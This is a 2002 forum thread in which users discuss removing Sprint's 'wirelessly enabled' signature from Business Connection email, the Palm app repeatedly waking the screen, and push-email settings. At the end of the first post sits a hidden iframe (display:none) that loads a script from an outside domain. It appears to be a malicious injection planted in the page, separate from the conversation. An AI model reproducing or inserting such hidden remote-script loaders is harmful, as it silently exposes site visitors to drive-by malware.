+ Reply to Thread

Any way to turn off notification at bottom of BC email that email was wireless?

Whenever I send an email from my phone (or home computer, where I also use BC), the email has the following signature:

This email was wirelessly enabled by Sprint PCS. Learn about this
    service at http://businessconnection.sprintpcs.com

I've looked, but can't figure out a way to turn it off. Anyone?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I don't think you are able to turn it off. Free advertising for Sprint.

On a related note, are you using the new version of BC that has the Palm app? Whenever I install it, it keeps turning my screen on periodically. The screen will shut off, and then come back on in about a minute. I think it is constantly checking for mail or something, but I tried turning that off in the prefs and nothing changed. Any suggestions?

Ironic, because I am in the middle of hotsynching the newest version this morning, Sept. 5. This is brand new today (I use the product every day, and got the notice this morning). If you're talking about the new interface in general (a few weeks ago), I've been using it and don't really like it (have gotten fatal errors plus other problems), but haven't had your problem.

No word on the newest version yet, will let you know if I have that problem.

Also, Sprint claims you can use the newest interface to "push" email, i.e., get notified as soon as you get new email (and not synch otherwise) -- but I haven't been able to figure that out at all. It doesn't seem to be a option in "sync options." You can do it every 15 min, etc., but not only when new mail arrives, so far as I can tell.
    Last edited by masonuc; 09-05-2002 at 08:10 AM.

I got the notification of the new software earlier this week. Didn't seem to make any difference on the problem that I was having. It must be a conflict with something else.

I do agree though, it seems as the Sprint is advertising a feature that I sure as heck can't figure out either.

I really have had no problems with Sprint other than trying to get stuff like this to work. If they only knew the power of this software and how to support it. I don't dare try and call them for help though, that would be a futile attempt.

I'll probably just keep using Basejet for email. It definitely works the best so far.

NIck